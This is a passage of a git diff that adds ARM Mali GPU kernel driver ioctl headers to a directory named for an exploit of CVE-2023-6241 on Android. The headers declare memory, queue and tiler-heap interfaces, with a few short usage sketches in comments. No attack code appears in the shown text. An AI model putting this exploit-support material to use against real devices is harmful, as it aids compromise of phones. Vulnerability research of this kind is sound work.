+ */ +union kbase_ioctl_cs_queue_group_create { + struct { + __u64 tiler_mask; + __u64 fragment_mask; + __u64 compute_mask; + __u8 cs_min; + __u8 priority; + __u8 tiler_max; + __u8 fragment_max; + __u8 compute_max; + __u8 csi_handlers; + __u8 padding[2]; + /** + * @in.reserved: Reserved + */ + __u64 reserved; + } in; + struct { + __u8 group_handle; + __u8 padding[3]; + __u32 group_uid; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_CREATE \ + _IOWR(KBASE_IOCTL_TYPE, 58, union kbase_ioctl_cs_queue_group_create) + +/** + * struct kbase_ioctl_cs_queue_group_term - Terminate a GPU command queue group + * + * @group_handle: Handle of the queue group to be terminated + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_cs_queue_group_term { + __u8 group_handle; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_TERMINATE \ + _IOW(KBASE_IOCTL_TYPE, 43, struct kbase_ioctl_cs_queue_group_term) + +#define KBASE_IOCTL_CS_EVENT_SIGNAL \ + _IO(KBASE_IOCTL_TYPE, 44) + +typedef __u8 base_kcpu_queue_id; /* We support up to 256 active KCPU queues */ + +/** + * struct kbase_ioctl_kcpu_queue_new - Create a KCPU command queue + * + * @id: ID of the new command queue returned by the kernel + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_new { + base_kcpu_queue_id id; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_CREATE \ + _IOR(KBASE_IOCTL_TYPE, 45, struct kbase_ioctl_kcpu_queue_new) + +/** + * struct kbase_ioctl_kcpu_queue_delete - Destroy a KCPU command queue + * + * @id: ID of the command queue to be destroyed + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_delete { + base_kcpu_queue_id id; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_DELETE \ + _IOW(KBASE_IOCTL_TYPE, 46, struct kbase_ioctl_kcpu_queue_delete) + +/** + * struct kbase_ioctl_kcpu_queue_enqueue - Enqueue commands into the KCPU queue + * + * @addr: Memory address of an array of struct base_kcpu_queue_command + * @nr_commands: Number of commands in the array + * @id: kcpu queue identifier, returned by KBASE_IOCTL_KCPU_QUEUE_CREATE ioctl + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_enqueue { + __u64 addr; + __u32 nr_commands; + base_kcpu_queue_id id; + __u8 padding[3]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_ENQUEUE \ + _IOW(KBASE_IOCTL_TYPE, 47, struct kbase_ioctl_kcpu_queue_enqueue) + +/** + * union kbase_ioctl_cs_tiler_heap_init - Initialize chunked tiler memory heap + * @in: Input parameters + * @in.chunk_size: Size of each chunk. + * @in.initial_chunks: Initial number of chunks that heap will be created with. + * @in.max_chunks: Maximum number of chunks that the heap is allowed to use. + * @in.target_in_flight: Number of render-passes that the driver should attempt to + * keep in flight for which allocation of new chunks is + * allowed. + * @in.group_id: Group ID to be used for physical allocations. + * @in.padding: Padding + * @in.buf_desc_va: Buffer descriptor GPU VA for tiler heap reclaims. + * @out: Output parameters + * @out.gpu_heap_va: GPU VA (virtual address) of Heap context that was set up + * for the heap. + * @out.first_chunk_va: GPU VA of the first chunk allocated for the heap, + * actually points to the header of heap chunk and not to + * the low address of free memory in the chunk. 
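+ *
+ * Initialisation sketch (chunk size and counts are illustrative):
+ *
+ *   union kbase_ioctl_cs_tiler_heap_init heap = {0};
+ *   heap.in.chunk_size = 1 << 21;
+ *   heap.in.initial_chunks = 5;
+ *   heap.in.max_chunks = 200;
+ *   heap.in.target_in_flight = 1;
+ *   ioctl(fd, KBASE_IOCTL_CS_TILER_HEAP_INIT, &heap);
+ *   (the heap context GPU VA is returned in heap.out.gpu_heap_va)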
+ */ +union kbase_ioctl_cs_tiler_heap_init { + struct { + __u32 chunk_size; + __u32 initial_chunks; + __u32 max_chunks; + __u16 target_in_flight; + __u8 group_id; + __u8 padding; + __u64 buf_desc_va; + } in; + struct { + __u64 gpu_heap_va; + __u64 first_chunk_va; + } out; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_INIT \ + _IOWR(KBASE_IOCTL_TYPE, 48, union kbase_ioctl_cs_tiler_heap_init) + +/** + * union kbase_ioctl_cs_tiler_heap_init_1_13 - Initialize chunked tiler memory heap, + * earlier version upto 1.13 + * @in: Input parameters + * @in.chunk_size: Size of each chunk. + * @in.initial_chunks: Initial number of chunks that heap will be created with. + * @in.max_chunks: Maximum number of chunks that the heap is allowed to use. + * @in.target_in_flight: Number of render-passes that the driver should attempt to + * keep in flight for which allocation of new chunks is + * allowed. + * @in.group_id: Group ID to be used for physical allocations. + * @in.padding: Padding + * @out: Output parameters + * @out.gpu_heap_va: GPU VA (virtual address) of Heap context that was set up + * for the heap. + * @out.first_chunk_va: GPU VA of the first chunk allocated for the heap, + * actually points to the header of heap chunk and not to + * the low address of free memory in the chunk. + */ +union kbase_ioctl_cs_tiler_heap_init_1_13 { + struct { + __u32 chunk_size; + __u32 initial_chunks; + __u32 max_chunks; + __u16 target_in_flight; + __u8 group_id; + __u8 padding; + } in; + struct { + __u64 gpu_heap_va; + __u64 first_chunk_va; + } out; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_INIT_1_13 \ + _IOWR(KBASE_IOCTL_TYPE, 48, union kbase_ioctl_cs_tiler_heap_init_1_13) + +/** + * struct kbase_ioctl_cs_tiler_heap_term - Terminate a chunked tiler heap + * instance + * + * @gpu_heap_va: GPU VA of Heap context that was set up for the heap. + */ +struct kbase_ioctl_cs_tiler_heap_term { + __u64 gpu_heap_va; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_TERM \ + _IOW(KBASE_IOCTL_TYPE, 49, struct kbase_ioctl_cs_tiler_heap_term) + +/** + * union kbase_ioctl_cs_get_glb_iface - Request the global control block + * of CSF interface capabilities + * + * @in: Input parameters + * @in.max_group_num: The maximum number of groups to be read. Can be 0, in + * which case groups_ptr is unused. + * @in.max_total_stream_num: The maximum number of CSs to be read. Can be 0, in + * which case streams_ptr is unused. + * @in.groups_ptr: Pointer where to store all the group data (sequentially). + * @in.streams_ptr: Pointer where to store all the CS data (sequentially). + * @out: Output parameters + * @out.glb_version: Global interface version. + * @out.features: Bit mask of features (e.g. whether certain types of job + * can be suspended). + * @out.group_num: Number of CSGs supported. + * @out.prfcnt_size: Size of CSF performance counters, in bytes. Bits 31:16 + * hold the size of firmware performance counter data + * and 15:0 hold the size of hardware performance counter + * data. + * @out.total_stream_num: Total number of CSs, summed across all groups. + * @out.instr_features: Instrumentation features. Bits 7:4 hold the maximum + * size of events. Bits 3:0 hold the offset update rate. 
+ * (csf >= 1.1.0) + * + */ +union kbase_ioctl_cs_get_glb_iface { + struct { + __u32 max_group_num; + __u32 max_total_stream_num; + __u64 groups_ptr; + __u64 streams_ptr; + } in; + struct { + __u32 glb_version; + __u32 features; + __u32 group_num; + __u32 prfcnt_size; + __u32 total_stream_num; + __u32 instr_features; + } out; +}; + +#define KBASE_IOCTL_CS_GET_GLB_IFACE \ + _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_ioctl_cs_get_glb_iface) + +struct kbase_ioctl_cs_cpu_queue_info { + __u64 buffer; + __u64 size; +}; + +#define KBASE_IOCTL_VERSION_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check) + +#define KBASE_IOCTL_CS_CPU_QUEUE_DUMP \ + _IOW(KBASE_IOCTL_TYPE, 53, struct kbase_ioctl_cs_cpu_queue_info) + +/** + * union kbase_ioctl_mem_alloc_ex - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @in.fixed_address: The GPU virtual address requested for the allocation, + * if the allocation is using the BASE_MEM_FIXED flag. + * @in.extra: Space for extra parameters that may be added in the future. + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc_ex { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + __u64 fixed_address; + __u64 extra[3]; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC_EX _IOWR(KBASE_IOCTL_TYPE, 59, union kbase_ioctl_mem_alloc_ex) + +/** + * union kbase_ioctl_read_user_page - Read a register of USER page + * + * @in: Input parameters. + * @in.offset: Register offset in USER page. + * @in.padding: Padding to round up to a multiple of 8 bytes, must be zero. + * @out: Output parameters. + * @out.val_lo: Value of 32bit register or the 1st half of 64bit register to be read. + * @out.val_hi: Value of the 2nd half of 64bit register to be read. + */ +union kbase_ioctl_read_user_page { + struct { + __u32 offset; + __u32 padding; + } in; + struct { + __u32 val_lo; + __u32 val_hi; + } out; +}; + +#define KBASE_IOCTL_READ_USER_PAGE _IOWR(KBASE_IOCTL_TYPE, 60, union kbase_ioctl_read_user_page) + +#endif /* _UAPI_KBASE_CSF_IOCTL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_ioctl.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_ioctl.h new file mode 100644 index 0000000..9eaa83c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_ioctl.h @@ -0,0 +1,894 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2017-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. 
+ * + */ + +#ifndef _UAPI_KBASE_IOCTL_H_ +#define _UAPI_KBASE_IOCTL_H_ + +#ifdef __cpluscplus +extern "C" { +#endif + +#include +#include + +#include "mali_kbase_csf_ioctl.h" + +#define KBASE_IOCTL_TYPE 0x80 + +/** + * struct kbase_ioctl_set_flags - Set kernel context creation flags + * + * @create_flags: Flags - see base_context_create_flags + */ +struct kbase_ioctl_set_flags { + __u32 create_flags; +}; + +#define KBASE_IOCTL_SET_FLAGS \ + _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags) + +/** + * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel + * + * @buffer: Pointer to the buffer to store properties into + * @size: Size of the buffer + * @flags: Flags - must be zero for now + * + * The ioctl will return the number of bytes stored into @buffer or an error + * on failure (e.g. @size is too small). If @size is specified as 0 then no + * data will be written but the return value will be the number of bytes needed + * for all the properties. + * + * @flags may be used in the future to request a different format for the + * buffer. With @flags == 0 the following format is used. + * + * The buffer will be filled with pairs of values, a __u32 key identifying the + * property followed by the value. The size of the value is identified using + * the bottom bits of the key. The value then immediately followed the key and + * is tightly packed (there is no padding). All keys and values are + * little-endian. + * + * 00 = __u8 + * 01 = __u16 + * 10 = __u32 + * 11 = __u64 + */ +struct kbase_ioctl_get_gpuprops { + __u64 buffer; + __u32 size; + __u32 flags; +}; + +#define KBASE_IOCTL_GET_GPUPROPS \ + _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops) + +/** + * union kbase_ioctl_mem_alloc - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC \ + _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc) + +/** + * struct kbase_ioctl_mem_query - Query properties of a GPU memory region + * @in: Input parameters + * @in.gpu_addr: A GPU address contained within the region + * @in.query: The type of query + * @out: Output parameters + * @out.value: The result of the query + * + * Use a %KBASE_MEM_QUERY_xxx flag as input for @query. 
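+ *
+ * Example, as used by get_mem_size() in mali_jit_csf.c to read the
+ * committed size of a region:
+ *
+ *   union kbase_ioctl_mem_query query = {0};
+ *   query.in.gpu_addr = gpu_addr;
+ *   query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
+ *   ioctl(fd, KBASE_IOCTL_MEM_QUERY, &query);
+ *   (the committed page count is returned in query.out.value)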
+ */ +union kbase_ioctl_mem_query { + struct { + __u64 gpu_addr; + __u64 query; + } in; + struct { + __u64 value; + } out; +}; + +#define KBASE_IOCTL_MEM_QUERY \ + _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query) + +#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1) +#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2) +#define KBASE_MEM_QUERY_FLAGS ((__u64)3) + +/** + * struct kbase_ioctl_mem_free - Free a memory region + * @gpu_addr: Handle to the region to free + */ +struct kbase_ioctl_mem_free { + __u64 gpu_addr; +}; + +#define KBASE_IOCTL_MEM_FREE \ + _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free) + +/** + * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader + * @buffer_count: requested number of dumping buffers + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + * + * A fd is returned from the ioctl if successful, or a negative value on error + */ +struct kbase_ioctl_hwcnt_reader_setup { + __u32 buffer_count; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_READER_SETUP \ + _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup) + +/** + * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to. + * @data: Counter samples for the dummy model. + * @size: Size of the counter sample data. + * @padding: Padding. + */ +struct kbase_ioctl_hwcnt_values { + __u64 data; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_HWCNT_SET \ + _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values) + +/** + * struct kbase_ioctl_disjoint_query - Query the disjoint counter + * @counter: A counter of disjoint events in the kernel + */ +struct kbase_ioctl_disjoint_query { + __u32 counter; +}; + +#define KBASE_IOCTL_DISJOINT_QUERY \ + _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query) + +/** + * struct kbase_ioctl_get_ddk_version - Query the kernel version + * @version_buffer: Buffer to receive the kernel version string + * @size: Size of the buffer + * @padding: Padding + * + * The ioctl will return the number of bytes written into version_buffer + * (which includes a NULL byte) or a negative error code + * + * The ioctl request code has to be _IOW because the data in ioctl struct is + * being copied to the kernel, even though the kernel then writes out the + * version info to the buffer specified in the ioctl. + */ +struct kbase_ioctl_get_ddk_version { + __u64 version_buffer; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_GET_DDK_VERSION \ + _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version) + +/** + * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 10.2--11.4) + * @va_pages: Number of VA pages to reserve for JIT + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. 
+ */ +struct kbase_ioctl_mem_jit_init_10_2 { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2) + +/** + * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 11.5--11.19) + * @va_pages: Number of VA pages to reserve for JIT + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_11_5 { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5) + +/** + * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory + * allocator + * @va_pages: Number of GPU virtual address pages to reserve for just-in-time + * memory allocations + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * @phys_pages: Maximum number of physical pages to allocate just-in-time + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + */ +struct kbase_ioctl_mem_jit_init { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; + __u64 phys_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init) + +/** + * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory + * + * @handle: GPU memory handle (GPU VA) + * @user_addr: The address where it is mapped in user space + * @size: The number of bytes to synchronise + * @type: The direction to synchronise: 0 is sync to memory (clean), + * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants. 
+ * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_mem_sync { + __u64 handle; + __u64 user_addr; + __u64 size; + __u8 type; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_MEM_SYNC \ + _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync) + +/** + * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer + * + * @in: Input parameters + * @in.gpu_addr: The GPU address of the memory region + * @in.cpu_addr: The CPU address to locate + * @in.size: A size in bytes to validate is contained within the region + * @out: Output parameters + * @out.offset: The offset from the start of the memory region to @cpu_addr + */ +union kbase_ioctl_mem_find_cpu_offset { + struct { + __u64 gpu_addr; + __u64 cpu_addr; + __u64 size; + } in; + struct { + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset) + +/** + * struct kbase_ioctl_get_context_id - Get the kernel context ID + * + * @id: The kernel context ID + */ +struct kbase_ioctl_get_context_id { + __u32 id; +}; + +#define KBASE_IOCTL_GET_CONTEXT_ID \ + _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id) + +/** + * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd + * + * @flags: Flags + * + * The ioctl returns a file descriptor when successful + */ +struct kbase_ioctl_tlstream_acquire { + __u32 flags; +}; + +#define KBASE_IOCTL_TLSTREAM_ACQUIRE \ + _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire) + +#define KBASE_IOCTL_TLSTREAM_FLUSH \ + _IO(KBASE_IOCTL_TYPE, 19) + +/** + * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region + * + * @gpu_addr: The memory region to modify + * @pages: The number of physical pages that should be present + * + * The ioctl may return on the following error codes or 0 for success: + * -ENOMEM: Out of memory + * -EINVAL: Invalid arguments + */ +struct kbase_ioctl_mem_commit { + __u64 gpu_addr; + __u64 pages; +}; + +#define KBASE_IOCTL_MEM_COMMIT \ + _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit) + +/** + * union kbase_ioctl_mem_alias - Create an alias of memory regions + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.stride: Bytes between start of each memory region + * @in.nents: The number of regions to pack together into the alias + * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_alias { + struct { + __u64 flags; + __u64 stride; + __u64 nents; + __u64 aliasing_info; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_ALIAS \ + _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias) + +/** + * union kbase_ioctl_mem_import - Import memory for use by the GPU + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.phandle: Handle to the external memory + * @in.type: Type of external memory, see base_mem_import_type + * @in.padding: Amount of extra VA pages to append to the imported buffer + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_import { + struct { + __u64 flags; + __u64 phandle; + __u32 type; + __u32 padding; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + 
} out; +}; + +#define KBASE_IOCTL_MEM_IMPORT \ + _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import) + +/** + * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region + * @gpu_va: The GPU region to modify + * @flags: The new flags to set + * @mask: Mask of the flags to modify + */ +struct kbase_ioctl_mem_flags_change { + __u64 gpu_va; + __u64 flags; + __u64 mask; +}; + +#define KBASE_IOCTL_MEM_FLAGS_CHANGE \ + _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change) + +/** + * struct kbase_ioctl_stream_create - Create a synchronisation stream + * @name: A name to identify this stream. Must be NULL-terminated. + * + * Note that this is also called a "timeline", but is named stream to avoid + * confusion with other uses of the word. + * + * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes. + * + * The ioctl returns a file descriptor. + */ +struct kbase_ioctl_stream_create { + char name[32]; +}; + +#define KBASE_IOCTL_STREAM_CREATE \ + _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create) + +/** + * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence + * @fd: The file descriptor to validate + */ +struct kbase_ioctl_fence_validate { + int fd; +}; + +#define KBASE_IOCTL_FENCE_VALIDATE \ + _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate) + +/** + * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel + * @buffer: Pointer to the information + * @len: Length + * @padding: Padding + * + * The data provided is accessible through a debugfs file + */ +struct kbase_ioctl_mem_profile_add { + __u64 buffer; + __u32 len; + __u32 padding; +}; + +#define KBASE_IOCTL_MEM_PROFILE_ADD \ + _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add) + +/** + * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to map + */ +struct kbase_ioctl_sticky_resource_map { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_MAP \ + _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map) + +/** + * struct kbase_ioctl_sticky_resource_unmap - Unmap a resource mapped which was + * previously permanently mapped + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to unmap + */ +struct kbase_ioctl_sticky_resource_unmap { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \ + _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap) + +/** + * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of + * the GPU memory region for + * the given gpu address and + * the offset of that address + * into the region + * @in: Input parameters + * @in.gpu_addr: GPU virtual address + * @in.size: Size in bytes within the region + * @out: Output parameters + * @out.start: Address of the beginning of the memory region enclosing @gpu_addr + * for the length of @offset bytes + * @out.offset: The offset from the start of the memory region to @gpu_addr + */ +union kbase_ioctl_mem_find_gpu_start_and_offset { + struct { + __u64 gpu_addr; + __u64 size; + } in; + struct { + __u64 start; + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset) + +#define KBASE_IOCTL_CINSTR_GWT_START \ + _IO(KBASE_IOCTL_TYPE, 33) + +#define KBASE_IOCTL_CINSTR_GWT_STOP \ + 
_IO(KBASE_IOCTL_TYPE, 34) + +/** + * union kbase_ioctl_cinstr_gwt_dump - Used to collect all GPU write fault + * addresses. + * @in: Input parameters + * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas. + * @in.size_buffer: Address of buffer to hold size of modified areas (in pages) + * @in.len: Number of addresses the buffers can hold. + * @in.padding: padding + * @out: Output parameters + * @out.no_of_addr_collected: Number of addresses collected into addr_buffer. + * @out.more_data_available: Status indicating if more addresses are available. + * @out.padding: padding + * + * This structure is used when performing a call to dump GPU write fault + * addresses. + */ +union kbase_ioctl_cinstr_gwt_dump { + struct { + __u64 addr_buffer; + __u64 size_buffer; + __u32 len; + __u32 padding; + + } in; + struct { + __u32 no_of_addr_collected; + __u8 more_data_available; + __u8 padding[27]; + } out; +}; + +#define KBASE_IOCTL_CINSTR_GWT_DUMP \ + _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump) + +/** + * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone + * + * @va_pages: Number of VA pages to reserve for EXEC_VA + */ +struct kbase_ioctl_mem_exec_init { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_EXEC_INIT \ + _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init) + +/** + * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of + * cpu/gpu time (counter values) + * @in: Input parameters + * @in.request_flags: Bit-flags indicating the requested types. + * @in.paddings: Unused, size alignment matching the out. + * @out: Output parameters + * @out.sec: Integer field of the monotonic time, unit in seconds. + * @out.nsec: Fractional sec of the monotonic time, in nano-seconds. + * @out.padding: Unused, for __u64 alignment + * @out.timestamp: System wide timestamp (counter) value. + * @out.cycle_counter: GPU cycle counter value. + */ +union kbase_ioctl_get_cpu_gpu_timeinfo { + struct { + __u32 request_flags; + __u32 paddings[7]; + } in; + struct { + __u64 sec; + __u32 nsec; + __u32 padding; + __u64 timestamp; + __u64 cycle_counter; + } out; +}; + +#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \ + _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo) + +/** + * struct kbase_ioctl_context_priority_check - Check the max possible priority + * @priority: Input priority & output priority + */ + +struct kbase_ioctl_context_priority_check { + __u8 priority; +}; + +#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check) + +/** + * struct kbase_ioctl_set_limited_core_count - Set the limited core count. + * + * @max_core_count: Maximum core count + */ +struct kbase_ioctl_set_limited_core_count { + __u8 max_core_count; +}; + +#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \ + _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count) + +/** + * struct kbase_ioctl_kinstr_prfcnt_enum_info - Enum Performance counter + * information + * @info_item_size: Performance counter item size in bytes. + * @info_item_count: Performance counter item count in the info_list_ptr. + * @info_list_ptr: Performance counter item list pointer which points to a + * list with info_item_count of items. + * + * On success: returns info_item_size and info_item_count if info_list_ptr is + * NULL, returns performance counter information if info_list_ptr is not NULL. + * On error: returns a negative error code. 
+ */ +struct kbase_ioctl_kinstr_prfcnt_enum_info { + __u32 info_item_size; + __u32 info_item_count; + __u64 info_list_ptr; +}; + +#define KBASE_IOCTL_KINSTR_PRFCNT_ENUM_INFO \ + _IOWR(KBASE_IOCTL_TYPE, 56, struct kbase_ioctl_kinstr_prfcnt_enum_info) + +/** + * struct kbase_ioctl_kinstr_prfcnt_setup - Setup HWC dumper/reader + * @in: input parameters. + * @in.request_item_count: Number of requests in the requests array. + * @in.request_item_size: Size in bytes of each request in the requests array. + * @in.requests_ptr: Pointer to the requests array. + * @out: output parameters. + * @out.prfcnt_metadata_item_size: Size of each item in the metadata array for + * each sample. + * @out.prfcnt_mmap_size_bytes: Size in bytes that user-space should mmap + * for reading performance counter samples. + * + * A fd is returned from the ioctl if successful, or a negative value on error. + */ +union kbase_ioctl_kinstr_prfcnt_setup { + struct { + __u32 request_item_count; + __u32 request_item_size; + __u64 requests_ptr; + } in; + struct { + __u32 prfcnt_metadata_item_size; + __u32 prfcnt_mmap_size_bytes; + } out; +}; + +#define KBASE_IOCTL_KINSTR_PRFCNT_SETUP \ + _IOWR(KBASE_IOCTL_TYPE, 57, union 